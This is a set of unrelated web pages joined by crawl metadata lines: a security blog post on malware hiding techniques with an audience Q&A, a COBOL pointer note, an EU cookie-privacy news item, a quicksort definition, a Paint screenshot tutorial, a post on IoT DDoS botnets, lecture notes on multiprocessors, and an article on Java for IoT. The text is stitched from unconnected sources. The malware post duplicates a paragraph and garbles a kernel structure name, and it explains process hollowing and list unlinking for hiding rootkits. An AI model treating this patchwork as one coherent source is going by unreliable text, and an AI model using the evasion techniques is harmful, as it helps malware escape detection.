Process injection is exactly what it sounds like. It is injecting some bits of code into a running process. Malware leverages process injection techniques to hide code execution and avoid detection by utilizing known “good” processes such as svchost.exe or explorer.exe. To inject itself into known good processes, malware writers use built-in Windows APIs. One of them is setting debug. When a process sets as debug, it gains access to many of the debug API calls, such as attaching to other processes and instructing processes to allocate additional memory. Once a process has allocate more memory, then a malicious process can inject whatever code it wishes into that process.
A great example of malware that uses process injection is Poison Ivy. Poison Ivy's process injection is one of my favorites not only because it is very well known but also because it is used in many campaigns, and does process injection slightly differently than other kinds of malware. When malware allocates a chunk of memory, normally that chunk of memory is “contiguous”, so at the end of a memory block, it will allocate another memory block and inject code there. Poison Ivy does what we call “sharding.” Instead of having one giant memory block, it has a whole bunch of tiny memory blocks split all over the process and sometimes in various processes. A great example of malware that uses process injection is Poison Ivy. Poison Ivy's process injection is one of my favorites not only because it is very well known but also because it is used in many campaigns, and does process injection slightly differently than other kinds of malware. When malware allocates a chunk of memory, normally that chunk of memory is “contiguous”, so at the end of a memory block, it will allocate another memory block and inject code there.
Here’s an OTX pulse on Poison Ivy: https://otx.alienvault.com/browse/pulses/?q=poison%20ivy
Another technique related to process injection is process hollowing. ‘Hollowing’ is a process where you take a known good process and start it in a suspended state. When that code is loaded and about to execute, you scoop some of the good code out (like with an ice cream scoop). Now there is available space where a bad guy can place whatever code they like, maybe change a few headers on the top and bottom to make everything seem okay, and then restart the execution process. As far as a user knows, this process looks like a normal system process started by Windows. It is therefore much more difficult for reverse engineers and memory forensics people to analyze.
Dridex is a very good example of a malware family that often uses process hollowing. Here’s an OTX pulse on Dridex:
Process List Unlinking
Process List Unlinking is another key concept. A process is anything that is running on your computer, whether it be in user space or kernel space. Process List Unlinking involves a double-linked list that contains all “active” processes. It’s important because unlinking will result in a process being hidden from all “active” tools. This can be done using ZwSystemDebugControl() or by mapping \Device\PhysicalMemory. Inside the process list is a list of every single process that is running and inside the process object is forward-pointed and backwards-pointed into the process in front of it or the process behind it to make a double-linked list.
A Flink to the process before it and then Blink to the one in front of it effectively removes the process from the list. More advanced malware will take this a step further and after they remove that process from the list, they will also write over that bit of memory, so even with memory forensics you wouldn't be able to locate that process.
There are tools that security researchers can use to find hidden malicious code, such as
- PsAc4veProcessHead traversal
- Pool tag scanning for processes
- Pool tag scanning for threads
This is an example bit of code that somebody would use to unlink from the process list.
DLL List Unlinking
Malware can also hide by manipulating the DLL list. Just like the process list, a DLL list has a double-linked list that points to the DLL in front and behind, and again just like the process lists are APIs that can be called to rewrite entries in the DLL list, remove that DLL entry and wipe out that bit of memory to help hide the malware from memory forensics or from backup tools. This is used a lot in rootkit activity. Here’s a graphic explaining DLL lists:
Here we have another example of code used to unlink from the DLL list:
You can see where it is writing over the one in front, the one behind, and then wiping out the memory and the zero memory function call. One other thing to remember about DLL and process list linking is that all that can be done from the user space, so I don't need kernel-level administrative rights.
Kernel Module List Unlinking
Kernel modules are the next level down. A kernel module is any of the modules that is loaded into the kernel. Like the DLL and process list, the kernel modules have their own list that can be queried with APIs and return every kernel module that is loaded. There are also debug APIs that can remove one DLL module from the list and zero it out. This is especially important because at the kernel level when something is zeroed out it makes it lot harder to find. This access is like ring zero access - definitely associated with rootkit activity. Generally, a piece of malware will execute in user space and then try a kernel-level exploit to get kernel administrative access; it then drops the main rootkit, which would then zero itself out inside the kernel module list process list. At this point, the malware is very well hidden and it will be very difficult to find.
How Kernel Module List Unlinking Works:
Questions from the Audience:
JAVVAD: So most malware sandboxes can’t deal with samples that remain dormant for a considerable amount of time before execution, such as Keranger. Have any new techniques been developed to overcome this?
PETER: Yes, there are a couple of different ways to overcome that. One way to tell malware remains dormant involves a certain amount system time. One way to manipulate that is to make the time go faster on the virtual machine, so every millisecond is actually ten minutes or every millisecond is actually five hours, defeating the dormant malware by waiting it out.
JAVVAD: How can AlienVault detect the malware hiding techniques that were described in the presentation?
PETER: Excellent question. One of the ways we can detect various hiding techniques described in the presentation, is based upon Windows logging. One example of such detection would be a processes acquiring the ability to utilize the built in Windows debug capabilities. There are known "Good" applications that use those functions, but outside of them it looks suspicious when other processes outside that circle utilize those debug capabilities which when then can alert on.
JAVVAD: Do you have anything to detect CryptoLocker or any other similar type family of ransomware?
PETER: Yes, we have correlation rules for CryptoLocker and various ransomware families.
JAVVAD: Is it anything specific that makes Ransomware different to look for compared to other sorts of malware, or is it pretty much the same techniques that you use?
PETER: These techniques are more about hiding. Ransomware generally is not very good at hiding, that is not its job. Its job is to be loud and in your face. So generally we can look for that being loud and in your face or any sort of network detector, so like it is connecting to known bad domains, etcetera.
JAVVAD: Is there a tool that can utilize OTX to scan a raw memory image file for IoCs?
PETER: What I would personally recommend is while you can't import memory images into OTX yet, you can use a tool such as Volatility to pull out IP and/or domains depending on what you want to scan, and then you can cross-reference with OTX based on the information that you pull up from the memory image.
JAVVAD: What is the general turnaround time between the AlienVault team capturing a sample of the zero-day attack and actually producing signatures?
PETER: That is hard to give an exact answer to because every bit of malware is different and every zero-day is different. Sometimes it can be a couple of hours, sometimes it may take longer than that.
JAVVAD: Yes. I will just add to that, actually. Last year, Adobe released a zero-day, and actually because the IoCs were being reused from previous campaigns, effectively we were blocking that zero-day three months prior to Adobe actually publicly announcing it. So it is not always the case that zero-days produce effects.
About Peter and Javvad
Peter Ewane is a security researcher at AlienVault. Follow him on Twitter https://twitter.com/eaterofpumpkin
Javvad Malik is the security advocate at AlienVault. Follow him on Twitter https://twitter.com/J4vv4D | <urn:uuid:10d45fc6-d597-4f66-9e9d-e40942c45bb3> | CC-MAIN-2017-04 | https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00015-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941352 | 2,233 | 2.71875 | 3 |
Pointers are data items that contain virtual storage addresses. You define them either explicitly with the USAGE IS POINTER clause in the DATA DIVISION or implicitly as ADDRESS OF special registers.
You can perform the following operations with pointer data items:
Pass them between programs by using the CALL . . . BY REFERENCE statement.
Move them to other pointers by using the SET statement.
Compare them to other pointers for equality by using a relation condition.
Initialize them to contain an invalid address by using VALUE IS NULL. | <urn:uuid:edf4bb14-b803-4011-80f4-85508eaa973b> | CC-MAIN-2017-04 | http://ibmmainframes.com/about16219.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00319-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.89101 | 112 | 2.671875 | 3 |
A new type of internet cookie threatens users' privacy and security by tracking their online behaviour for advertising management, profiling, and other reasons, the EU's cyber security agency Enisa warns.
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
Describing the latest breed of cookies (short bits of code that help to regulate a user's visit to a website via the browser) Enisa says the advertising industry has led the drive for new, persistent and powerful cookies, with privacy-invasive features for marketing practices and profiling.
It says both the user's browser and the origin server must assist informed consent, and that users should be able to manage their cookies easily.
Enisa says the new cookies support user identification in a "persistent manner". They do not have enough "transparency" in how they are being used, so it is hard to quantify their security and privacy implications, it says.
Enisa says informed consent should guide the design of systems using cookies and that their use and the data stored in cookies should be transparent to users.
"All cookies should have user-friendly removal mechanisms which are easy to understand and use by any user," Enisa said.
It says storage of cookies outside browser control should be limited or banned, and that users should have an alternative service channel if they do not accept cookies.
Enisa executive director Udo Helmbrecht said these next-generation cookies need to be as transparent and user-controlled as regular HTTP cookies. "This would safeguard the privacy and security aspects of consumers and business alike," he said. | <urn:uuid:5f51522f-4fa3-453c-8a63-0d1865ab53fc> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/1280095226/New-internet-cookies-could-steal-users-identities-invade-privacy-says-EU-cyber-agency | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00319-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951052 | 335 | 2.65625 | 3 |
Definition: A variant of quicksort which attempts to choose a pivot likely to represent the middle of the values to be sorted.
See also median.
Note: This is one of several attempts to prevent bad worst cases in quicksort by choosing the initial pivot.
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 17 December 2004.
HTML page formatted Mon Feb 2 13:10:39 2015.
Cite this as:
Art S. Kagel, "balanced quicksort", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 17 December 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/balancedqsrt.html | <urn:uuid:cc9065cc-a005-4f41-aa62-78989f25ca8e> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/balancedqsrt.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00319-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.847028 | 173 | 3.015625 | 3 |
How To Capture And Edit A Screen Shot
This outline will describe how to make an image from the content displayed on your computer screen. The aim will be to isolate an item on the screen so it can be posted back to the internet.
We will be using Paint to edit the image.
1) Make the target image that you want to capture appear on the screen. If it is an error message it may be helpful to place it in the middle of the screen.
2) Press the Print Screen key once on your keyboard. This key located to the right of the F12 key, and above the Insert key on the upper right side of the keyboard.
3) Open Paint. It will be found here... Start>Program Files>Accessories>Paint
4) From the Toolbar select Edit. The Paste option will be highlighted. Left click on it. The entire screen will be display in the workspace in Paint.
5) Place your mouse cursor on the upper left corner of the image you wish to save. A small cross with a circle in the center will appear. Press and hold the left mouse button. Drag the cursor down and to the right of the desired image. When the image has been highlighted with a dotted line release the mouse button.
6) Right click the mouse button and select Copy.
7) From the Toolbar select File, then New. You will be asked to save the desktop image. Select yes and give the file a name. I recommend you save it in the event you have to start over. You should now have a white empty field.
8) From the Toolbar select Edit and then Paste.
9) You will now have the image in the workspace. You will edit the image from here to a) remove more of the image or B) keep the current view but reduce it's overall size.
a) Place the mouse cursor on the lower right corner of the image. When you are in place a double arrow will appear. Press and hold down the left mouse button, and drag the cursor to the left and up till the desired size is reached. This will remove part of the image. When you have the image you want stop.
B) From the Toolbar select Image then Stretch and Skew.... By decreasing the Horizontal and Vertical you will reduce the size of the image. By increasing the number to above 100 you will increase the image size.
Note: If you make a mistake you can simply click the Undo feature in Edit. Each time you click Undo it will take you back one step, undoing all changes.
10) Save you image by selecting Save as... under File in the Toolbar. I recommend .jpg, or .gif. If you are placing your image to the internet make sure whatever file type you use is supported.
Edited by acklan, 05 February 2006 - 12:45 AM. | <urn:uuid:4d254395-7e51-4a99-9dda-a86060b3df62> | CC-MAIN-2017-04 | https://www.bleepingcomputer.com/forums/t/43088/how-to-capture-and-edit-a-screen-shot/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00345-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.831657 | 595 | 3.15625 | 3 |
Embedded Internet-of-Thing (IoT) botnets are not a new phenomenon – we’ve seen them leveraged to launch DDoS attacks, send spam, engage in man-in-the-middle (MitM) credentials hijacking, and other malicious activities for several years. For example, a few years ago, a 75,000-strong botnet comprised of embedded devices – consumer broadband routers, in that instance – was found to be launching DDoS attacks. We routinely see IoT botnets comprised of webcams, DVRs, cable television set-top boxes, satellite set-top boxes, etc. used to launch DDoS attacks.
IoT botnets have been used to launch high-profile DDoS attacks against online gaming networks, to engage in DDoS extortion attempts, and to target organizations affiliated with the Rio Olympics, as shown above and discussed in this blog post.
IoT devices are attractive to attackers because so many of these devices are shipped with insecure defaults, including default administrative credentials, open access to management systems via the Internet-facing interfaces on these devices, and shipping with insecure, remotely exploitable code. A large proportion of embedded systems are rarely if ever updated in order to patch against security vulnerabilities – indeed, many vendors of such devices do not provide security updates at all.
Embedded IoT devices are often low-interaction – end-users don’t spend much time directly interfacing with them, and so aren’t given any clues that they’re being exploited by threat actors to launch attacks.
There are tens of millions of vulnerable IoT devices, and their numbers are growing daily; they’re generally always turned on; they reside on networks which aren’t monitored for either incoming or outgoing attack traffic; and the networks where they’re deployed often offer high-speed connections, which allows for a relatively high amount of DDoS attack traffic volume per compromised device.
Organizations can defend against DDoS attacks by implementing best current practices (BCPs) for DDoS defense, including hardening their network infrastructure, ensuring they’ve complete visibility into all traffic ingressing and egressing from their networks so as to detect DDoS attacks, ensuring they’ve sufficient DDoS mitigation capacity and capabilities (either on-premise or via cloud-based DDoS mitigation services, or both), and by having a DDoS defense plan which is kept updated and is rehearsed on a regular basis.
In particular, ISP and MSSP network operators should actively participate in the global operational community, so that they can both render assistance when other network operators come under high-volume DDoS attacks as well as request mitigation assistance as circumstances warrant. Active, continuous cooperation between enterprise network operators, ISPs, and MSSPs is the key to successful DDoS defense.
It’s also very important that when measuring DDoS attack volumes, network operators take into account the baseline load of their normal internet traffic so as to neither underestimate or overestimate the amount of attack traffic targeting their networks and customers. This is vital when determining which DDoS defense mechanisms and methodologies to employ in the course of an attack, as well as to ensure that accurate information is provided to the global operational community and to the media. | <urn:uuid:5403bd23-d86b-4fa3-9fa7-cab4d83bb01c> | CC-MAIN-2017-04 | https://resources.arbornetworks.com/h/i/296396268-some-perspective-on-iot-devices-and-ddos-attacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00126-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941686 | 674 | 2.8125 | 3 |
Loosely Coupled Multiprocessors
Our previous discussions of multiprocessors focused on systems built with a modest number of processors (no more than about 50), which communicate via a shared bus.
The class of computers we shall consider in this and the next lecture is called “MPP”, for Massively Parallel Processor”. As we shall see, the development of MPP systems was resisted for a long time, due to the belief that such designs could not be cost effective.
We shall see that MPP systems finally evolved due to a number of factors, at least one of which only became operative in the late 1990’s.
availability of small and inexpensive microprocessor units (Intel 80386, etc.)
that could be efficiently packaged into a small unit.
discovery that many very important problems were quite amenable to
discovery that many of these important problems had structures of such
regularity that sequential code could be automatically translated for parallel
execution with little loss in efficiency.
The process of converting a sequential program for parallel execution is often called “parallelization”. One speaks of “parallelizing an algorithm”; often this is misspoken as “paralyzing an algorithm” – which unfortunately might be true.
The Speed–Up Factor
In an earlier lecture, we spoke of the speed–up factor, S(N), which denotes how much faster a program will execute on N processors than on one processor. At the time, we referenced early opinions that the maximum speed–up for N processors would be somewhere in the range [log2(N), N/log2(N)].
We shall show some data for multicomputers with 2 to 65,536 processors in the next few slides. Recall that 65,536 = 216. The processor counts were chosen so that I could perform the calculation log2(N) in my head; log2(65,536) = 16 because 65,536 = 216.
The plots are log–log plots, in which each axis is scaled logarithmically. This allows the data to be seen. The top line represents linear speedup, the theoretical upper limit.
In the speedup graph, we see that the speed–up factor N/log2(N) might be acceptable, though it is not impressive.
The next graph is what I call “cost efficiency”. It is the speed–up factor divided by the number of processors: S(N)/N. This factor measures the economic viability of the design.
the assumptions above, we see easily why large MPP designs did not appear
to be attractive in the early 1990’s and before.
The Speed–Up Factor: S(N)
Examine a few values for the N/log2(N) speedup: S(1024) = 102 and S(65536) = 4096. These might be acceptable under certain specific circumstances.
The Cost Efficiency Factor: S(N) / N
This chart shows the real problem that was seen for MPP systems before the late 1990’s. Simply put, they were thought to be very cost inefficient.
Linear Speedup: The MPP Goal
The goal of MPP system design is called “linear speedup”, in which the performance of an N–processor system is approximately N times that of a single processor system.
Earlier in this lecture we made the comment that “Many important problems, particularly ones that apply regular computations to massive data sets, are quite amenable to parallel implementations”.
Within the context of our lectures, the ambiguous phrase “quite amenable to parallel implementations” acquires a specific meaning: there are well–know algorithms to solve the problem and these algorithms can display a nearly–linear speedup when implemented on MPP systems.
As noted in an earlier lecture “Characteristics of Numerical Applications”, problems that can be solved by algorithms in the class called “continuum models” are likely to show near–linear speedup. This is due to the limited communication between cells in the continuum grid.
There are other situations in which MPP systems might be used. In 1990, Hennessy and Patters on [Ref. 2, page 575] suggested that “a multiprocessor may be more effective for a timesharing workload than a SISD [single processor]”. This seems to be the usage on the large IBM mainframe used by CSU to teach the course in assembly language.
Linear Speedup: The View from the Early 1990’s
Here is what Harold Stone [Ref. 3] said in his textbook. The first thing to note is that he uses the term “peak performance” for what we call “linear speedup”.
His definition of peak performance is quite specific. I quote it here.
“When a multiprocessor is operating at peak
performance, all processors are engaged in useful work. No processor is idle, and no processor is
executing an instruction that would not be executed if the same algorithm were
executing on a single processor. In this
state of peak performance, all N processors are contributing to effective
performance, and the processing rate is increased by a factor of N. Peak performance is a very special state that
is rarely achievable.” [Ref. 3, page 340].
Stone notes a number of factors that introduce inefficiencies and inhibit peak performance. Here is his list.
1. The delays introduced by interprocessor communication.
2. The overhead in synchronizing the work of one processor with another.
3. The possibility that one or more processors will run out of tasks and do nothing.
4. The process cost of controlling the system and scheduling the tasks.
Early History: The C.mmp
this lecture will focus on multicomputers, it is instructive to begin with a
review of a paper on the C.mmp, which is a shared–memory multiprocessor
The C.mmp is described in a paper by Wulf and Harbinson [Ref. 6], which has been noted as “one of the most thorough and balanced research–project retrospectives … ever seen”. Remarkably, this paper gives a thorough description of the project’s failures.
The C.mmp is described [Ref. 6] as “a multiprocessor composed of 16 PDP–11’s, 16 independent memory banks, a crosspoint [crossbar] switch which permits any processor to access any memory, and a typical complement of I/O equipment”. It includes an independent bus, called the “IP bus”, used to communicate control signals.
As of 1978, the system included the following 16 processors.
5 PDP–11/20’s, each rated at 0.20 MIPS (that is 200,000 instructions per second)
11 PDP–11/40’s, each rated at 0.40 MIPS
3 megabytes of shared memory (650 nsec core and 300 nsec semiconductor)
The system was observed to compute at 6 MIPS.
The Design Goals of the C.mmp
The goal of the project seems to have been the construction of a simple system using as many commercially available components as possible.
The C.mmp was intended to be a research project not only in distributed processors, but also in distributed software. The native operating system designed for the C.mmp was called “Hydra”. It was intended as an OS kernel, intended to provide only minimal services and encourage experimentation in system software.
As of 1978, the software developed on top of the Hydra kernel included file systems, directory systems, schedulers and a number of language processors.
Another part of the project involved the development of performance evaluation tools, including the Hardware Monitor for recording the signals on the PDP–11 data bus and software tools for analyzing the performance traces.
One of the more important software tools was the Kernel Tracer, which was built into the Hydra kernel. It allowed selected operating system events, such as context swaps and blocking on semaphores, to be recorded while a set of applications was running.
The Hydra kernel was originally designed based on some common assumptions. When experimentation showed these to be false, the Hydra kernel was redesigned.
The C.mmp: Lessons Learned
researchers were able to implement the C.mmp as “a cost–effective, symmetric
multiprocessor” and distribute the Hydra kernel over all of the processors.
The use of two variants of the PDP–11 was considered as a mistake, as it complicated the process of making the necessary processor and operating system modifications. The authors had used newer variants of the PDP–11 in order to gain speed, but concluded that “It would have been better to have had a single processor model, regardless of speed”.
The critical component was expected to be the crossbar switch. Experience showed the switch to be “very reliable, and fast enough”. Early expectations that the “raw speed” of the switch would be important were not supported by experience.
The authors concluded that “most applications are sped up by decomposing their algorithms to use the multiprocessor structure, not by executing on processors with short memory access times”.
The simplicity of the Hydra kernel, with much system software built on top of it, yielded benefits, such as few software errors caused by inadequate synchronization.
The C.mmp: More Lessons Learned
Here I quote from Wulf & Harbison [Ref. 6], arranging their comments in an order not found in their original. The PDP–11 was a memory–mapped architecture with a single bus, called the UNIBUS, that connected the CPU to both memory and I/O devices.
1. “Hardware (un)reliability was our largest day–to–day disappointment … The aggregate mean–time–between–failure (MTBF) of C.mmp/Hydra fluctuated between two to six hours.”
2. “About two–thirds of the failures were directly attributable to hardware problems. There is insufficient fault detection built into the hardware.”
3. “We found the PDP–11 UNIBUS to be especially noisy and error–prone.”
4. “The crosspoint [crossbar] switch is too trusting of other components; it can be hung by malfunctioning memories or processors.”
My favorite lesson learned is summarized in the following two paragraphs in the report.
“We made a serious error in not writing good diagnostics for the hardware. The software developers should have written such programs for the hardware.”
“In our experience, diagnostics written by the hardware group often did not test components under the type of load generated by Hydra, resulting in much finger–pointing between groups.”
Task Management in Multicomputers
The basic idea behind both multicomputers and multiprocessors is to run multiple tasks or multiple task threads at the same time. This goal leads to a number of requirements, especially since it is commonly assumed that any user program will be able to spawn a number of independently executing tasks or processes or threads.
According to Baron and Higbie [Ref. 5], any multicomputer or multiprocessor system must provide facilities for these five task–management capabilities.
1. Initiation A process must be able to spawn another process;
that is, generate another process and activate it.
2. Synchronization A process must be able to suspend itself or another process
until some sort of external synchronizing event occurs.
3. Exclusion A process must be able to monopolize a shared resource,
such as data or code, to prevent “lost updates”.
4. Communication A process must be able to exchange messages with any
other active process that is executing on the system.
5. Termination A process must be able to terminate itself and release
all resources being used, without any memory leaks.
These facilities are more efficiently provided if there is sufficient hardware support.
Hardware Support for Multitasking
Any processor or group of processors that supports multitasking will do so more efficiently if the hardware provides an appropriate primitive operation.
A test–and–set operation with a binary semaphore (also called a “lock variable”) can be used for both mutual exclusion and process synchronization. This is best implemented as an atomic operation, which in this context is one that cannot be interrupted until it completes execution. It either executes completely or fails.
The MIPS provides another set of instructions to support synchronization. In this design, synchronization is achieved by using a pair of instructions, issued in sequence.
After the first instruction in the sequence is executed, the second is execute and returns a value from which it can be deduced whether or not the instruction pair was executed as if it were a single atomic instruction.
The MIPS instruction pair is load linked and store conditional.
These are often used in a spin lock scenario, in which a processor executes in a tight loop awaiting the availability of the shared resource that has been locked by another processor.
In fact, this is not a necessary part of the design, but just its most common use.
Clusters, Grids, and the Like
There are many applications amenable to an even looser grouping of multicomputers. These often use collections of commercially available computers, rather than just connecting a number of processors together in a special network.
In the past there have been problems of administering large clusters of computers; the cost of administration scaling as a linear function of the number of processors. Recent developments in automated tools for remote management are likely to help here.
It appears that blade servers are one of the more recent adaptations of the cluster concept. The major advance represented by blade servers is the ease of mounting and interconnecting the individual computers, called “blades”, in the cluster.
In this aspect, the blade server hearkens back to the 1970’s and the innovation in instrumentation called “CAMAC”, which was a rack with a standard bus structure for interconnecting instruments. This replaced the jungle of interconnecting wires, so complex that it often took a technician dedicated to keeping the communications intact.
Clusters can be placed in physical proximity, as in the case of blade servers, or at some distance and communicate via established networks, such as the Internet. When a network is used for communication, it is often designed using TCP/IP on top of Ethernet simply due to the wealth of experience with this combination.
In this lecture, material from one or more of the following references has been used.
Organization and Design, David A. Patterson & John L. Hennessy,
Morgan Kaufmann, (3rd Edition, Revised Printing) 2007, (The course textbook)
ISBN 978 – 0 – 12 – 370606 – 5.
Architecture: A Quantitative Approach, John L. Hennessy and
David A. Patterson, Morgan Kauffman, 1990. There is a later edition.
ISBN 1 – 55860 – 069 – 8.
Computer Architecture, Harold S. Stone,
Addison–Wesley (Third Edition), 1993. ISBN 0 – 201 – 52688 – 3.
Computer Organization, Andrew S. Tanenbaum,
Pearson/Prentice–Hall (Fifth Edition), 2006. ISBN 0 – 13 – 148521 – 0
5. Computer Architecture,
Robert J. Baron and Lee Higbie,
Addison–Wesley Publishing Company, 1992, ISBN 0 – 201 – 50923 – 7.
6. W. A. Wulf and S. P. Harbison, “Reflections in a pool of
processors / An
experience report on C.mmp/Hydra”, Proceedings of the National Computer
Conference (AFIPS), June 1978. | <urn:uuid:489b991d-1ca0-467b-bb40-494e1b610878> | CC-MAIN-2017-04 | http://edwardbosworth.com/My5155_Slides/Chapter13/Multiprocessors_02.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00430-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.945472 | 3,389 | 3.15625 | 3 |
What is Java to you? A programming language you learned in college? The lingua franca of corporate IT? Would you believe that Java is poised to dominate the next explosion of the Internet? Built for embedded computing and streamlined for real-time applications, here's why Java is the language for IoT.
The years from 1969 to present saw networked devices balloon from four university computers connected via the ARPANET to about two billion humans frequently accessing the Internet today. In the near future that number will exponentially multiply again, from a couple billion networked devices to tens of billions of embedded processors. Every aspect of our lives will be connected by networked devices: homes, workplaces, vehicles, appliances, tools, toys --you name it.
While chatter about the Internet of Things (IoT) includes a component of fashionable hype, the underlying reality is that imminent changes in Internet growth will make previous generations of computing look trivial by comparison. IoT is not only here to stay; it's here to change everything. Consider the following timeline, which shows previous tipping points for the Internet as we have known it:
- 1982-1989: Birth of the TCP/IP internet.
- 1985-1989: Commercialization of the Internet begins.
- 1990-1991: Advent of the World Wide Web.
- 1990-1998: Conventional desktop computers re-engineered as intrinsically networked devices.
- 1996-present: Slowly but surely, we enter the age of global domination by mobile networked devices (aka IoT).
Complementary technologies that enable IoT are coming online now. HTTP/2 is a crucial networking protocol that has been updated, in part, to accommodate machine-to-machine communications. Thingsee is an example of a developer kit for the kind of hardware that IoT will demand.
Silicon Valley sage Tim O'Reilly has emphasized that the result will not be just the usual caricature of pointless connections from coffee machines or refrigerators to the 'Net at large. With enough sensors and automation, IoT is really about human augmentation. Java will be a workhorse in that coming disruption.
How IoT works
In September 2014, Andrew C. Oliver wrote that at an implementation level IoT is about teamwork. In this case, the teamwork involves both humans and computers.
As devices communicate not just with human consumers, but with other devices, fundamentally new capabilities emerge. It's not only that your refrigerator will know you have run out of tomatoes, but that it can place an order for more on your behalf. The success of pervasive computing will be that it recedes into the background, working out facts and events and remedies with other connected devices. Only executive-level results will be communicated to human consumers. The triumph of IoT will be in all the things that we no longer have to think about, even as they are seamlessly done for us.
The most mundane examples are the most telling. Leave aside just-in-time agricultural pest treatments, miniaturized bomb-sniffers, improved medical diagnostic technology, or similarly impressive applications of IoT in recent news. Think instead of the humble vending machine -- one that's properly stocked, well maintained, and always silently awaiting your command.
When you place your bills in a vending machine and push buttons to indicate your purchase, several mechanisms interact to ensure the satisfaction of your hunger. You don't have to understand or agree with all the details of implementation; your stomach is just happy with the results. Now, we have IoT-enabled vending machines. When you make a purchase from an IoT-enabled vending machine, your purchase triggers actions spanning the globe to keep inventory in balance and parts well-maintained, at a total cost 30 percent lower than the pre-IoT model.
Java for embedded computing
Few people today realize that Java began as a language for embedded computing. Its earliest versions specifically targeted home appliances such as television set-top interfaces. Communication between devices was central to James Gosling's original vision for Java, and he envisioned it being used for not only device-to-consumer but device-to-device communication. Twenty years later, those original design strengths are ready to support the Internet of Things.
Java's ubiquity also makes it a good fit for IoT. Massive resources worldwide are invested in transmitting Java to a new generation of programmers and ensuring that it is maintained to support all the production systems that rely on it. Hundreds of thousands of successful applications and systems already attest to Java's capabilities.
For developers exploring embedded programming it is important to distinguish the parts of the Java platform. Nothing about how you code or read programs needs to change for embedded programming: good Java programmers can read embedded source code just as easily as they do the source for typical desktop enterprise applications. The libraries, and especially the development (and testing) environments, are specialized for embedded Java programming, however. Just be sure that you have the right toolchain for the embedded environment you target.
Java embedded programming in 2015
Java already had the right stuff to make embedded programming possible in 1996, but it lacked momentum. Today that momentum is gathering fast, and an ecosystem of Java standards and tools for embedded programming is ready to leverage it.
Between 2000 and 2010, it was generally true that Java-based embedded or "micro" computing centered on J2ME (Jave 2 Platform, Micro Edition). Now, Java Platform, Micro Edition, or Java ME, is the standard runtime environment for embedded applications. While Java ME and its concepts --especially profiles and configurations --remain crucial, mobile Java developers tend to focus more on Android, and HTML5 for user interfaces. Cellular telephone handsets are the most visible embedded computers, and roughly four out of five mobiles sold now are based on Android. (Although Android supports Java ME, the two have different product lifecycles, and it's not entirely clear who will decide what the next generation of application environments for practical embedded devices will be.)
Profiles and configurations are crucial concepts in embedded programming. An embedded profile such as MIDP is a collection of APIs supported on devices of interest. A configuration is a framework specification. While not strictly true it can be useful to think of profiles as belonging to configurations, including most prominently the CLDC or Connected Limited Device Configuration. (Also see "Jim Connors' Weblog" to learn more about profiles and configurations applicable to IoT.)
In addition to Java ME's profiles and configurations, a handful of enterprise Java technologies hold potential for embedded development. Java Management Extensions (JMX) is used for distributed resource management and monitoring and could one day complement embedded definitions neatly. Real-time Java also holds an important place in embedded programming for IoT.
Java's real-time model and tools
Embedded applications connected to sensors and effectors in medical, transportation, manufacturing, and other domains often have important real-time requirements. Predictable, correct results from heart pacemakers, engine controllers, pipeline valves, and so on are matters of life and death, not just annoying stack tracebacks.
While James Gosling intended Java to fulfill common real-time requirements, real-time computations weren't a strength of Java in its early years. In particular, many Java runtimes had a reputation for unreliability, or at least inconsistency in how they handled garbage collection. Real-Time Specification for Java (RTSJ) and related standards addressed temporal indeterminacy with support for periodic and sporadic task scheduling, task deadlines and CPU time budgets, garbage-collecting threads, and allowances that enable certain tasks to avoid garbage collection delays. RTSJ was approved in 2002 and has been implemented for a number of Java VMs.
Although RTSJ was officially listed as dormant in the Java Community Process until February 2015, specification experts have been actively at work refining and updating it throughout the last decade. As an example, JamaicaVM is an RTSJ implementation supported by aicas GmbH, available at no charge for educational and other non-commercial use.
More recently, Oracle has promoted Java SE for real-time systems, suggesting that Java SE has been enhanced sufficiently to meet soft real-time requirements. Soft here has at least two distinct related meanings. One is that requirements have to do with average behavior; for instance, it's good enough that an average bank transaction will post within 300 milliseconds. This is in contrast to hard real-time requirements, such as the requirement that a particular locomotive-switching solenoid close at worst within one-and-a-quarter seconds of the application receiving a specific alarm. The most important requirement for hard real-time systems, in this sense, is that the worst case must be predictable.
Soft real-time is good enough for many embedded and IoT applications. For applications that require hard real-time support, Java developers largely turn to JSR-302: Safety Critical Java Technology. This spec is a subset of the Real-Time Specification for Java, and parts of it depend on the CLDC. Among other features, Safety-Critical Java defines its own concurrency model and real-time threads. The Open Group industry consortium originally began work on Safety-Critical Java in 2003. Asked about the spec's status, JSR-302 specification lead Doug Locke estimated that its long gestation will lead to an approved specification this spring, with a reference implementation possible by early May 2015.
Next up in Java embedded
Java holds much promise for embedded programming, and there is work to be done in order to enable it to meet the coming explosion of demand and possibility in IoT. Tens of billions of Java-capable devices will go into use as part of the IoT network over the next few years. My next article on this topic will feature specific examples of programming for embedded Java environments in both hobbyist and commercial contexts, along with a deeper explanation of why RTSJ 2.0 will impact Java far beyond traditional domains for real-time programming.
